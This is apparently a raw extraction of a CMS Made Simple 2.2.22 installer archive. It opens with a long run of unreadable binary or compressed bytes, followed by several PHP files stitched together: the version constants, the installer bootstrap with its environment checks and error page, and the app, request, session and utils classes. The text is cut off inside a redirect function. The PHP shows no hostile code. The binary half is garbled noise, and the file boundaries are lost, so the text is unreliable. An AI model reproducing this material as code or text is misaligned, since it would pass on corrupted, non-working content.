������D��&��J�y�����ˬ�J	a�T�:�rY���#H�n<&6�p��nfe%┹�z����w��eY�q��]���(Y[̎���]��3k���E��2T�RzL��&ww�4��!̍��~Υ���a�⒡!kkU�A�V��FpV��5�nq�c������g���y�(��9w�m:W{X��3���'Ϥ[��S}y"yf&�Ȧ�^��抓l�/�Ǜ��Dž���\���g�o��������SB�g	�GwuM18����g���q�\nz�2�I[�ʆ%��|�7�8֋�X�ɹ�y�d�qT%y�ۛ�n�{b.�{k�^�㧈�芵Ii�~��G�R��$����yϳ���)�1#2.���HP���y�	^����}s��)�x�ۼ��.����5�s���h�]
AA��J�ӈ��LK��U��
����d�����S-"�@J������Ef��Ĥu׮g�-�TY�����C����IT59+�*ː��U�X�n��r��`w��n�{��$�;��۶����\f����A�w
����g�g�zWdc$�i`�����th]a�}&l~�n�-�����������u�>��1&���ϫ�{��_���E3���F�+���[:
�	�L���+�1�BUX��y�W��{��P�Q3ܶ�3�龭=�-G”������r��OF���np�o���z�Ӈ�R��62�[3}�b|��25gu�#�b���d�^?ם?�O6��v(�eR���_9
��=C���ȍY�ITI(�lr��D�C����l�Uc^<�H���G��.��.qw�T��?���K�I�9�Z�Cӿ�Z��:��A�&�@��3��YDV�j?3���A"

>�f��o�?q���I���|�t�K.��VZ�͇}s���n-�"�Y�.v��]\�p�ܽ��]l76��Tv�b�|�KI^~��Bu�,)M���`���tC���Yu��g}#����
��z�4��*=<����!W�V�I��Vײ��]�V%A�!H!ϟ
¿)����H�!���6
��ȡ
m-k�@Jr�e�&������™������r�4u�t�ڻX����q8�[B-9�ր�s�~ ��� A~���O@�����������'��/������C��}��0Mu�'XO��O�e��d�����q�CA�"��mo��n�d	���7��V��Z[jY�Zx:~�|�����詩���C8M���8���	Ss;Kj3Kk[��~S-����k~5n5K/'Km/us/;saZ	q�" �.��0�Y�C��w�"���\�Կ��؉�۠��4�e�,��9�9̹y�Ԃœ@~>a ����������E�E���CoNV"Z������qqq��rww�t��w��
sq�p��p<Hp8{B]L=8��tZ��t6w�up���R��65�wu���� jj3u�c�����ԁ����p�)��ei����:��\Z���N��aE���k��F#��d��(�`Y{sW�%�EIV���	����7�7(���B@����G(�-��/�����+$�����''��+
��J�	�
	Iq����H	���}�@��基���+���"2N��.�N:���?=@�������ށZF[��Y�������c��N�n��N���gX�[F^HP��e�ћ����ɬq=��s�?Y>�[�o��[�XBb��!8@܎{֪��������ݜ;U��9��RuN�����x��ˡ�x����eCj��I�.@�x7�����G2�\�l�~�$�"x��5H��1�LBm����6��}zަ6L5�}^E�*S+[?�����Ӳ����ri��x�C@e������w���vԿ��&�+��,�4�w��m]E2$��[qd}(">��I��$�"L��
�4k
x��'7�d��F�}h��.�M��
L�wD���юt�kD�M������ݔ�Q�v�����n���4Z����ޕ��dܙG���n�
RdmZv\�������g[�'��K���2.����ps����i�3:�}
������N�ġ�ƀQ�z���e�	��R`�NC�{��C�����|ΒBS����������쯷�.��o�(����s�S�bvĻ���3CU���n㶖vCƿ��)�aM��O�H�JȜ;�*���1i?����d��#//?�յ��$8�31A���\,�G�p�]��Ko��C�,�KA�푹��[S�h)%����^6o��L����\�_
;�-�x�Xm�[�������g��|I�Y<l�)�]���k�r��g-����?^Qv�-���AJ#�ئ�1-�5T矢Z�=�Ef��ѕM:X^�|��[����	���s.��<�u�21�l�}&xY!�-���삸�-��7�%q�Z�;�;���[q�w��:Dyw3�(cI�2�1���=�� �=��V�D�J���>T�:�?'?���BG���$����Ȧ8H��J�	�rֹxs��l��켟�Y$���
C I��};%u����@�o�-�?����+�����?�������>g��s0�?d.�H�[�7Zp�����G"5�y����3p��O����:�'\�e�Ӵͷ��Y
=�������*�Ns>����K�}P�z}�N���`Z�
U���$�Z?�
\Q4�:n&3�K��J'�]��AZ;�-'�M&��ƼUNj�]��B���,�a(8��J��%*�੫J�3*^��>;����
��>	�#g�9�~�|�e��<˃��(���`�dI�Wl��7oި�/zp�*��)�a�K�޶#A�P]���h���Ȅ���'�����n��F0�+�V5VVV�6޾�•��^٠G{���;}��3<}�ڸ6p�"o��ׁs>�a�
f�;T���ð��x�Q\���B˓�b3gvh�|��m�s�.��ݽ�캽y��|e��7���f�
;�m���}����)�FJ�"<mow�(y�x�M��怘�v�UF�e+`��^��z����x��������o[�%�Po;D���t��n)�r��8���۔���P#�*r�b:5ӕكWE"�\��BW>���I��c�t�`�{$�m��5��vcߍ��?�D�I�&׉u�5�����q�I�a��t6�����w�!gpZ�n֜��n��6���qM�H��g���n{"���;��~�Wi�?��_dـ�����Va_p�H�'��_���?�L�����?	��N���<��x�����7���@?���.6���1��������B�OF�WV�_Z���������ᑗ�����J�����-%��'+���
�������������K��]������_�B-�ݝ��?�@~!9���d�@�4��4//�,�O�WJ���?���Q��7g;���O��+��@~�f�~��ZM��[[*
��5^>2�x��]͍��P*k@�!�)�����؃�&���i����Cp? L�/�=��nx�1��臓�^Xx��KZ�z������7:v�?u����(��?w���rXtñ,Ϋ	����NP/��wH���"��'�c���.�x��n�!�q��{w��R�t��Ѓf�Nnj�w�9[	a�E)@�$0��ƭg��lX̶!��UP�֥�a�Xv��_�q�'�2���O��'

�̰S�w0�cc��/��I��0ؚ�����@���&�DA����r�� ق�z?"���Pw���0��n?zUM��zC8	2�yF�	����MR⇓��*�`0Ć�̩�5��ˀ�%�R�&kU�6N�r�a_��4�,.�$�
�`���v��1dGL#�b��òU<�*9�U_��b?�ɋ�&Q�L߉����#�C�mA�GiL*X��/���؞���U�7@L�MF��)]85#����<u�'����P���
�:S���7zI*6H��z�\�!��� ���A�&�08l��5��>�k��(��ˌؓ���t�(�à�w�旋��k2�]WeM���6�0��X5���-zO���j����Kż�����#�>�z�I*�.6t^��Ǚ�Ǻz����!��"�Nm���nd{[r^�SÌ*�`���)��6�nW�	�/*z1�AR]��G�3��-Oݽ.�SU��EA�@���M	�C:r���Ҙ�0��@�&���c@Hd�ca�9��m��
N\kk�0�'�<���z{�(�{l��$��<�N�&,�Z?A��q%�8Խ���x�t/��G^�2
�LU�L�uŬ�n>��C�F���[Cg	�ܨ�h#/J�j�{ߊ\��.F�i�fFGL�;ӡ�َ2qR��v�F���;X��5�ͯ�J�!m�ɦ#��z������:��l�e�T�� L�t�c����;?�>u[�Q���)�L_b_�A�$v�q^)�v����aB�LQ�s��d�u��k)fYG�lȰ
S4�Ã�ZB��q�P+�l�i7�	�:10 �Xijs]�r�DN$�@�ƮG*��g	|��A�HML
�͟;VAI�
���~l��`}Ue[+�����k�f��B�L=���w5U�ʱ=�Jh�[�a����c�f�� oƎB}��v�H�W4�=ea*�<�o�M�x)�h��9��2R��N�,�DU������҇e�MSC��M&u�J�
�k�t��4�^ȯ?~Q�X�[�,*�t_
���F�H��(X�|�#���Z`���0_?}�C:��7��z�3cj`T�v�����cA�2��m�9�}wN�qc�%[$�
�Y�v2��Z����t���HI�F�ؾV���lʌ|ˆ4�C��WX���/}k�t�-�+��g�/
�'���K�CRa��{Q���b�a֩JAm��\h��AKlo_V��'�N�m�6D�}`����'�av��M�^��7~җ��J�����nvS��}�����	{�8׃��.�=.�q�T㔕S�����-�Ek׳�{3��~z�+$��<��żgՃ4�vO��!lD�]��R�~�n�s3q�!WR&��7$�3;�mϛU�(��qg��=�2��D8�G�`1��5u+l6D>]����	��^�<	�>M�3�^���av�_#�6ۿ��:4p|�æ�AvB���
>�y^��}���h�׷�z�&#�ХZQ�@�#VV�q e.�.��<F�"��V$���/k-A__!�;��K�a��+?q�3�E� B-��(�0��N'�)�-�����WCVa���(��oOWkr1v�F��~V���[�}4?����*Լ<�S}���܄
���Q��*e����sس���z�
�R�_���o$ �ୟ��&9��~e����C�#R�m�xF���52�~x�s�̘��i��� A�=p���l��J�����A����D26�X���=$�y��)���R�������Q�ܙD�W�.2xk���P���QAS<,�#{��*��jk�wd$#I��8���Έ��T	M�
�,]��{�ܒ�d�0�_���i=��u���_Fi�7��7�H���!���#UIֱx�xZ�E⮛^��_�vłɬ�և/CB�bhJG̊�����ޛ�Ġ�=�̰��
����;e#��"u���.2-��~��5<�璌��Muլ'��ze6���'O��T^��Z$Ei�>í#ܥ�P=E��;\|A�?�*_�׍(fP/�X��g�bGvd�bLr�cè-��Q�e�.�,�0Q�%���Gqo~��C`��X=���E >�-qD��A|2'O��!�=��
毟��(U^�}�ö�0x�8�M��Z"y��]�Z�N�뾍�Yy�t�ͩ3��949w�}_xq%7���R�}(��:�
�WU/r�=���o���{[��p��q�/�`��DeAd{Y?VL�3p�Eae딒�m�S�G�G����b���O�/`L�~U��yҢ��F�����Q5t�~u�ِײ:�<�ws������w���&����#rל��{?�o�9�gE���k�ڽoL��ԣ��8`ω���X�c6f���z�������B�o����n�SG�RQS�.�ױ�S�TU#�y!l�Ϙ߻<�Q�Lge�70(u,���(Z�8X��hV������L�&�U٠z���gOP�Nv�)����v��*:�Y2__=�[�"QGG��EWV3D7�v��&�׏������,s���R6�KMo�#�;;��5`�hi����U����Ə�Z5�n���-T��R%�U���4Q3;��2���F��tōOD��`�lZLl��-��C�b�.mIZ���O�f�a�xdcR
����nFHT����1��Ϟ��2�k�"$yx�	'�Y�U�˺q_Q]Y���j��ٙev�q�\��Q�5�:�~�K�
�$)�<�	�c�������:�0yF��=P����-�l�l�$,�1&���4	V���{F�Ӹ)ɠ(2�;�NO�W������`V�S��?��;WNT}꘨0�ĝ�i讅��mw��BZ"7Z͊w1|C��7��u@�(��tb���E�bsе�b��F���{5pz���i��?])f[HX3�ce�@�p�{�US�V��+RP06��Ha��ٯ��H��3~�ڨFӞ.mdY���.is�15�7�I"[���S?�=�^��Z\�B���=+go=�^ɔU�l�ڼ����f�5�E�/�Ȱ�0��]�qNέFmA���;I�cb����WO���ib��R�;>~
Ġ�ba�6��
n��1`i�_%����\R��n�ԏDvP�����5�ڥM:��qMb,E��_��o#Q�_?m�\�|t��hU��{���ݪ)Rv��8�yS�Z���䚛�D������-[�.jŻ�hU���z�5�P�AZ�	]D�Q8Nl3��S6U�R����黯
�ڿ+�X��3�=
'j��M�3D���:�L�k�+SK��4aӏFa����:;�"D'U���]3�c�ˑI�WO܍��C<����VZ/� xد�Π]�oF[�����+]T@K��T]5rV���|(��ܺ���ꇤ��jDxBW5I���dS'&4�������/��=	E��n��n��P�/w�y�����`
����xS���޸�_¤W�6��J�ޏ�c�!�Ɇ��\��
�����J����'��%ތI�O2��U�����Q�H*���wvڄ��tVa��[����<�`����F'X!θcm_w"���
|f�{��+����k���!Ѡ�И2�4 ~>y�*�i��3�d;�ː���5��{��	ƎC���9��^�ܪ�k�ש���ȡ��W
-��D��@G�{���B0λ�жꕷ4��o�8p����A8��r���~�KF%[D=��~�q��|�Tx�Az�W��=�j��N��~�2�}Pze^UЏz�kLA�o����e�-�Q�#�3f���\~l�Љ�U�M͕_T�ޥS�dR��x7�T��G��+�}o�y����KB��\v>T)�~���$n��˼�?��m/	�5�-� =7=��pS��	�^P;�~͚���U1�<v�5�LO��\�.I�8����bT�ߋ�-g_U� 7X��"�+4B���~�n�ޓ��i�yR����&LH[��Z��P�A�zbi�7ܝb��}������I�.�|ؤo�t�̰�b���׋��i�G?]lq�$����#|���矷��q��iS_���X.#�ac:ěYj
��t���a5R��d��>#Ox}�q��1������ڙa
DU�!�^�
F-a��v$���/k��@U�xs�e"u?�=�����	��
�|�?nr�.��LKS��g�l��8Q�>�W��>ۃ�H�M���߄Ϗ�^a��z{��`C�쎰��N}iu��l�J48ɤ�\�Z
��(����ˎk�{�Ξ�P�%�i�I-��D�AU��U�c��d�`,V�U�AQ����I�Ž���ι�X�`��K;+O�L���8���d��(�!�]�
c��U�W��#԰�&�aZ	�4�h5m$���6�
[Y���]u�	��'4�'f��l��߼tc9�".
3þJ��V΄d|w�\()���[I�)bx잠�!�4<8~
�~S���rr}'�Bh�uG��C{��79oT��\*\
Y����h���Yލ8f�P�A��	0TB��4<����/Ec���q�t=OC��A�
{a��1*�5�{�"�-|bR�������)l�j�P��cE�Uvz�sb����n!�;�zs�QC��(�tl��r��|�Iϭ�4�a����tkFa(8�����{���~�8��Ԯ��&�G�Uaٮ��?�����hbN?Kh�
{w�3�ľ��?|��3	���t]�Hܙ��v���,:��͗���|�����)�n���K~�	���#a��jo5/w`������4V�f���O�:�6��w�FoˁM=�@���QJp������Q�����&��*�r�/�S��5JǼNL{���o�
�E�O�|3S2�W������'�B\ƪ��� T�3_��;��u���o�J��z���C�f�o5�/t�3����	����/�������N��Ӎ3w��2݉t��>��b��I��ݪ���/'E��Y�� �\G���u�2�2�"h�/��LB���b����d�lpM&��X��$�#�)�t��R�{�tR����<��z���FB��]iE$lr��$̠1���e�B#��t&ck�',�O6�fY��-˞e/=c��כ�+�򁩿QL��� �4���|������p�k��T(@]E.����swJ�f�Z���-�ט�_7�}����o�#�yמ�Tˑ�=�R'����?\@�-~�~�p'���E²>%�&=[�Y�%�O7�㾓��D���L��˺eWz[��=p�O�+,B��@�`�R�.�O1����W�:7�t[�5��9̰��?z�f
�ݤP��j�g�}�9��FT����^��D��D�D�tAQ���V���g�jL�k4 ���b�UȐ��+���C{U�f*�N���:��g���D�N�}��H�N��d�ҍI�fT��3O[ij0 /Q�Z�N�!	!�/#G9'�=��=ۊ#q��K6�\�l'AC6�O��7�Z%lj�σ�b^d=�����*t�}=#��\q'���J���`�x��ݺ�l},w�5��sn4����k-Q�X=Gia�0�W�V����̲	����MU�ս1�p�ΞW�Y�C|Ş-%n
�;�Ksߜ^���l�p�8,b\Sf�ރ�8��?�/��s�V8s��|��˱��o���Y�
XK�x��_
(�>�ܗu�b��E0-�
oݬ\����Z��?TWDmF]̀-L�&��7o_���S斡���\���븁�ȌCW8��T��sF;�+���ޟ�<c�5�`��PX%S�%8�c{{��_̣��nv:X/��v	�h�e>Ƞ���~�C��f��< (_�sb��}j��~̍��Wk	��A��;�/�b��/Yc�	�J�F�4�wu����_&�l-�جV�o��9釧9j9!�w%0/|�c8�ջ�*��߳�ӿ-��X`$h#F����?�7��ZEq�> �{1�oL4��d>Z���0v[3�N�8�0�	}�o����>�
�LHya��S����KT�(/��t�=�5b�R0H�Y�BMI�5$�:��W o����'�F5߶2�Ȝ>,U3g�L��''
8P�(�½m����ͼ�<ՙ�,O�JK�`J�x��O:+i^�*��J=���S�d�;��e�Ę����--A!����6
E���Gvk�=�z�hB�5;�#mѮ�O�}eKb3�
�{o�&$2U�a��j��=���G�۰���9,[S@jAɷ�9�jW7/п��?��_$,���z�kA�B�+9:�ϼ��X.�G��X{�c������os��(���8k���d�Q�—�y���=����TH�ji��0#��D��*:(<�3�^�Ů
��r+���1�6r����?�q8Ͼ���;�鳣Ur���6~I	s�d��S�~M�V��И�}�{�	
G& ���5q�U,���$%�=W�VI�&B����hM�a�,!�=�8��RBZ�$M�76rE1�U#��O}8����<>$��%6�UȄ9�_�Vr@�P:�+��6M�В�T��M�O�Y���l����o+�0��c��n�"��Y��zFW�[o�0�ɯ�I܌�gΡ�5<�}��"J�8�d9�\�م,�]1�P�?!%8�^�K�ǽv�d�a-Q8c*s��V
�e��oC�~���^"����Ob�����֭E
��M�vkw���;A%�w�ge3�ӹW^J0{
��܃x��O�#�Ljm޿���?��٧�)I�Otx/>5r�K�t���s�|U��&-ғ����EZ�`#,��������j.4�tPD��n�7N��A����}����3��	�2a�̣���d���n'fܺ�HD���j_���4�P��3��}C�-�y�}<ĭ)�<`�G��.�^Z��}��D��2 �aM�H�.d�{�&rdSw�`�(�^<:㖆uY8�%ɚ�	~�x?i��m�H�3Jv��wk�ə�)@x.qP�]n$G5)^!)=*(e(�a��r����j�:#�j�R�À�I��Gh��n=�>��QQ=Yra��c��,ϱL�l&4��p�NhSKĊ:fYX#�Y��1FV�(��Mv4�H��`�K��e�Ϙ�5���֕��Ir�� ���_)�0|�N��}�|
Ȓ�$m�A��4��mT�ߵ��:E�:;��$���)Hԏ�M�߉�&����tY?
�N��ㆻ	�<Zʔ�f���t��A�	��T��k��������\_'��~��^*K��B@��_��/H���TR=N�4i��t0bЕl~\ 7a�:����G�xo��!U���D����x�hq����H�0u��i��k����n��&d��n_AS�
/��^�LYgѽ\����+��q��nV }A@&BxT�"�x��S��>�>\�3gDL$C��KjX!w�t4�.`�A�c�y��ƌD:
��- ct��k���>��\15�	)�~@��{����X�G,@•*!ĀM��	U�9>c�^��]	Z��0��8w ���c��l�0;}�
9̶S*`�:��2.�F�)	���G�D���F��e�%��)��=TͰ�
���؆	��k�q��
� J�?f�f��w����4��f���䂰����o�$��~^��O�p�}*95�̰�
ۻ��@$	�����e��~�f���f�{�����/��V� l�m�C�u�-zW�?���	rĴtJd)B��T$w+�-� ���Ͱ��n��[!A����T��s�];�=E��
�pk#�:��,6��V9�>��R�꼞�kl�r/¦x�7�Xw�,	�J�ؓ�ۻ�tܟ2�iؗ$�L�
]�B�D|CS�BH��~���2 ���`������C�}�/����E�m���:�/�J<?php
#---------------------------------------------------------------------------
# CMS Made Simple - Power for the professional, Simplicity for the end user.
# (c) 2004 - 2011 by Ted Kulp
# (c) 2011 - 2018 by the CMS Made Simple Development Team
# (c) 2018 and beyond by the CMS Made Simple Foundation
# This project's homepage is: https://www.cmsmadesimple.org
#---------------------------------------------------------------------------
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# Or read it online: http://www.gnu.org/licenses/licenses.html#GPL
#---------------------------------------------------------------------------
$CMS_VERSION = '2.2.22';
$CMS_VERSION_NAME = 'Saskatoon';
$CMS_SCHEMA_VERSION = '202';

define('CMS_VERSION', $CMS_VERSION);
define('CMS_VERSION_NAME', $CMS_VERSION_NAME);
define('CMS_SCHEMA_VERSION', $CMS_SCHEMA_VERSION);

#
# EOF
#<?php
#---------------------------------------------------------------------------
# CMS Made Simple - Power for the professional, Simplicity for the end user.
# (c) 2004 - 2011 by Ted Kulp
# (c) 2011 - 2018 by the CMS Made Simple Development Team
# (c) 2018 - 2020 by the CMS Made Simple Foundation
# This project's homepage is: https://www.cmsmadesimple.org
#---------------------------------------------------------------------------
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# Or read it online: http://www.gnu.org/licenses/licenses.html#GPL
#---------------------------------------------------------------------------

//
// initialization
//
namespace cms_autoinstaller;

try {
    function _detect_bad_ioncube()
    {
        if( \extension_loaded('ionCube Loader') ) {
            if( \function_exists('ioncube_loader_version') ) {
                $ver = \ioncube_loader_version();
                if(\version_compare($ver, '4.1') < 0 ) throw new \RuntimeException('An old version of ioncube loader was detected.  Older versions are known to have problems with PHAR files. Sorry, but we cannot continue.');
            }
        }
    }

    // some basic system wide pre-requisites
    if("cli" == \php_sapi_name()) throw new \RuntimeException("We are sorry but:\n\nCLI based execution of this script is not supported.\nPlease browse to this script with a compatible browser");
    if( \version_compare(\phpversion(),'5.4.0') < 0 ) throw new \RuntimeException('We are sorry, but this installer requires at least PHP 5.4.0');
    _detect_bad_ioncube();
    
    // clear opcache before disabling it
    if(\function_exists('opcache_get_status' ) && \opcache_get_status() ) \opcache_reset();
    // disable some stuff.
    @\ini_set('opcache.enable', 0);     // disable zend opcode caching.
    @\ini_set('apc.enabled', 0);        // disable apc opcode caching (for later versions of APC)
    @\ini_set('xcache.cacher', 0);      // disable xcache opcode caching

    require_once('app/class.cms_install.php');
    $app = new cms_install;
    $app->run();
}
catch( \Exception $e ) {
    // this handles fatal, serious errors.
    // cannot use stylesheets, scripts, or images here, as the problem may be a phar based problem
    $out = <<<EOT
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>CMS Made Simple Installer: Fatal Error</title>
  </head>
  <body>
    <div style="border-radius: 3px; max-width: 85%; margin: 10% auto; font-family: Arial, Helvetica Neue, Helvetica, sans-serif; background-color: #f2dede; border: 1px solid #ebccd1; color: #a94442; padding: 15px;">
      <h1>Fatal Error</h1>
      <p>[message]</p>
    </div>
  </body>
</html>
EOT;
    # build the message but remove the __DIR__ stuff
    $message = '<strong>' . \str_replace("\n", '<br>', $e->getMessage()) . '</strong><br>';
    $message .= '<p><small>' . "\n\n" . \str_replace("\n", '<br>', $e->getTraceAsString()) . '</small></p>';
    $message = \str_replace(__DIR__, '', $message);
    $message = \preg_replace('/(require_once\(.*\))/m', '<em>--redacted--</em>', $message);
    
    echo \str_replace('[message]', $message, $out);
}

?>
<?php

namespace __appbase;

function smarty()
{
  return cms_smarty::get_instance();
}

function nls()
{
  return nlstools::get_instance();
}

function translator()
{
  return langtools::get_instance();
}

?><?php

namespace __appbase;

require_once(__DIR__.'/compat.functions.php');
require_once(__DIR__.'/misc.functions.php');
require_once(\dirname(__DIR__) . '/accessor.functions.php');

abstract class app
{
  public const CONFIG_ROOT_URL = 'root_url';
  
  private static $_instance;
  private $_config;
  private $_appdir;
  
  public function __construct($filename)
  {
    if( \is_object(self::$_instance) ) throw new \RuntimeException('Cannot create another object of type app');
    self::$_instance = $this;
    
    \spl_autoload_register(__NAMESPACE__ . '\app::autoload');
    
    if( $filename ) {
      $this->_appdir = \dirname($filename);
      $config_file = $this->_appdir.'/config.ini';
      if( \file_exists($config_file) ) $this->_config = \parse_ini_file($config_file);
    }
  }
  
  /**
   * @return \__appbase\app|static
   * @throws \Exception
   */
  public static function get_instance()
  {
    if( !\is_object(self::$_instance) )	throw new \RuntimeException('There is no registered app instance');
    return self::$_instance;
  }
  
  public function get_name()
  {
    return __CLASS__;
  }
  
  /**
   * @throws \Exception
   */
  public static function get_tmpdir()
  {
    // not modifiable, ye
    return \__appbase\utils::get_sys_tmpdir();
  }
  
  public static function get_appdir()
  {
    return self::$_instance->_appdir;
  }
  
  public static function get_rootdir()
  {
    return \dirname(__DIR__, 3);
  }
  
  public static function get_rooturl()
  {
    $config = self::$_instance->get_config();
    if( $config && isset($config[self::CONFIG_ROOT_URL]) ) { return $config[self::CONFIG_ROOT_URL]; }
    
    $request = request::get();
    
    return \dirname($request['SCRIPT_FILENAME']);
  }
  
  public function get_config()
  {
    return self::$_instance->_config;
  }
  
  /**
   * @throws \Exception
   */
  public static function clear_cache($do_index_html = TRUE)
  {
    $rdi = new \RecursiveDirectoryIterator(self::$_instance->get_tmpdir());
    $rii = new \RecursiveIteratorIterator($rdi);
    foreach( $rii as $file => $info ) {
      if( $info->isFile() ) @\unlink($info->getPathInfo());
    }
    
    if( $do_index_html ) {
      $rdi = new \RecursiveDirectoryIterator(self::$_instance->get_tmpdir());
      $rii = new \RecursiveIteratorIterator($rdi);
      foreach( $rii as $file => $info ) {
        if( $info->isFile() ) @\touch($info->getPathInfo() . '/index.html');
      }
    }
  }
  
  static public function autoload($classname)
  {
    $dirsuffix = \dirname(\str_replace('\\', '/', $classname));
    $classname = \basename(\str_replace('\\', '/', $classname));
    $dirsuffix = \str_replace('__appbase', '.', $dirsuffix);
    //if( $dirsuffix == "__appbase" ) $dirsuffix = '.';
    
    $dirs = array(__DIR__, \dirname(__DIR__), \dirname(__DIR__) . '/tests', \dirname(__DIR__) . '/base', dirname(dirname(__DIR__)) );
    foreach( $dirs as $dir ) {
      $fn = "$dir/$dirsuffix/class.$classname.php";
      if( \file_exists($fn) ) {
        include_once($fn);
        return;
      }
    }
  }
  
  abstract public function run();
  
} // end of class

/**
 * @throws \Exception
 */
function get_app()
{
  return app::get_instance();
}

?>
<?php

namespace __appbase;

class request implements \ArrayAccess
{
  private static $_instance;
  private $_data;
  const METHOD_POST = 'POST';
  const METHOD_GET  = 'GET';

  private function __construct()
  {
  }

  public static function get()
  {
    if( !self::$_instance ) self::$_instance = new request();
    return self::$_instance;
  }
  
  #[\ReturnTypeWillChange]
  public function offsetExists($key)
  {
    if( isset($_REQUEST[$key]) ) return TRUE;
    return FALSE;
  }
  
  #[\ReturnTypeWillChange]
  public function offsetGet($key)
  {
    if( isset($_REQUEST[$key]) ) return $_REQUEST[$key];
  }
  
  #[\ReturnTypeWillChange]
  public function offsetSet($key,$value)
  {
    if( isset($_REQUEST[$key]) ) return $_REQUEST[$key];
  }
  
  
  #[\ReturnTypeWillChange]
  public function offsetUnset($key)
  {
    throw new \RuntimeException('Attempt to unset a request variable');
  }

  public function raw_server($key)
  {
    if( isset($_SERVER[$key]) )
      return $_SERVER[$key];
  }

  public function __call($fn,$args)
  {
    $key = \strtoupper($fn);
    if( isset($_SERVER[$key]) )	return $this->raw_server($key);
    throw new \RuntimeException('Call to unknown method ' . $fn . ' in request object');
  }

  public function self()
  {
    return $this->raw_server('PHP_SELF');
  }

  public function method()
  {
    if( $this->raw_server('REQUEST_METHOD') == 'POST' ) {
      return self::METHOD_POST;
    }
    elseif( $this->raw_server('REQUEST_METHOD') == 'GET' ) {
      return self::METHOD_GET;
    }
    throw new \RuntimeException('Unhandled request method ' . $_SERVER['REQUEST_METHOD']);
  }

  public function is_post()
  {
    return ($this->method() == self::METHOD_POST)?TRUE:FALSE;
  }

  public function is_get()
  {
    return ($this->method() == self::METHOD_GET)?TRUE:FALSE;
  }

  public function accept()
  {
    return $this->raw_server('HTTP_ACCEPT');
  }

  public function accept_charset()
  {
    return $this->raw_server('HTTP_ACCEPT_CHARSET');
  }

  public function accept_encoding()
  {
    return $this->raw_server('HTTP_ACCEPT_ENCODING');
  }

  public function accept_language()
  {
    return $this->raw_server('HTTP_ACCEPT_LANGUAGE');
  }

  public function host()
  {
    return $this->raw_server('HTTP_HOST');
  }

  public function referer()
  {
    return $this->raw_server('HTTP_REFERER');
  }

  public function user_agent()
  {
    return $this->raw_server('HTTP_USER_AGENT');
  }

  public function https()
  {
    if( isset($_SERVER['HTTPS']) && 'on' != \strtolower($_SERVER['HTTPS'])) return TRUE;
    return FALSE;
  }

} // end of class

?><?php

namespace __appbase;

final class session implements \ArrayAccess
{
  private static $_instance;
  private static $_session_id;
  private static $_key;
  private $_data;
  private function __construct() {}

  private static function start()
  {
      if( !self::$_key ) {
          $session_key = \substr(\md5(__DIR__), 0, 10);
          @\session_name('CMSIC' . $session_key);
          @\session_cache_limiter('private'); # TODO: may also be worthwhile to set this to 'no-cache' instead (JM 2016-08-25)
          $res = null;
          if( !@\session_id() )
          {
            if (PHP_SESSION_ACTIVE === \session_status()) { \session_destroy(); }  # TODO: alternative to set to 'no-cache' (JM 2016-08-25)
   
            $res = @\session_start();
          }
          if( !$res ) throw new \RuntimeException('Problem starting the session (system configuration problem?)');
          self::$_session_id = \session_id();
          self::$_key = 'k' . \md5(self::$_session_id);
      }
  }

  private function _collapse()
  {
    self::start();
    if( $this->_data ) $_SESSION[self::$_key] = \serialize($this->_data);
    $this->_data = null;
  }

  private function _expand()
  {
    self::start();
    if( !\is_array($this->_data) ) {
      $this->_data = [];
      if( isset($_SESSION[self::$_key]) ) {
          $this->_data = \unserialize($_SESSION[self::$_key]);
      }
    }
  }

  public static function clear()
  {
      self::start();
      unset($_SESSION[self::$_key]);
  }

  public static function get()
  {
    if( !self::$_instance ) self::$_instance = new session;
    return self::$_instance;
  }

  public function reset()
  {
      $this->_data = null;
      self::clear();
      $this->_expand();
  }
  
  #[\ReturnTypeWillChange]
  public function offsetExists($key)
  {
    $this->_expand();
    if( isset($this->_data[$key]) ) return TRUE;
    return FALSE;
  }
  
  #[\ReturnTypeWillChange]
  public function offsetGet($key)
  {
    $this->_expand();
    if( isset($this->_data[$key]) ) return $this->_data[$key];
  }
  
  #[\ReturnTypeWillChange]
  public function offsetSet($key,$value)
  {
    $this->_expand();
    $this->_data[$key] = $value;
    $this->_collapse();
  }
  
  #[\ReturnTypeWillChange]
  public function offsetUnset($key)
  {
    $this->_expand();
    if( isset($this->_data[$key]) ) {
      unset($this->_data[$key]);
      $this->_collapse();
    }
  }
} // end of class

?>
<?php

namespace __appbase;

class utils
{
    private static $_writable_error = [];

    private function __construct() {}
    
    public static function redirect($to)
    {
        $_SERVER['PHP_SELF'] = null;
        $schema = '443' == $_SERVER['SERVER_PORT'] ? 'https' : 'http';
        $host = \strlen($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: $_SERVER['SERVER_NAME'];
        
        $components = \parse_url($to);

        if (\count($components) > 0) {
            $to =  (isset($components['scheme']) && startswith($components['scheme'], 'http') ? $components['scheme'] : $schema) . '://';
            $to .= $components['host'] ?? $host;
            $to .= isset($components['port']) ? ':' . $components['port'] : '';
            if(isset($components['path'])) {
                if(\in_array($components['path'][0], ['\\', '/'])) { //Path is absolute, just append.
                    $to .= $components['path'];
                }
                //Path is relative, append current directory first.
                else if (isset($_SERVER['PHP_SELF'])) { //Apache
                    $to .= (\strlen(\dirname($_SERVER['PHP_SELF'])) > 1 ? \dirname($_SERVER['PHP_SELF']) . '/' : '/') . $components['path'];
                }
                else if (isset($_SERVER['REQUEST_URI'])) { //Lighttpd
                    if (endswith($_SERVER['REQUEST_URI'], '/'))
                        $to .= (\strlen($_SERVER['REQUEST_URI']) > 1 ? $_SERVER['REQUEST_URI'] : '/') . $components['path'];
                    else
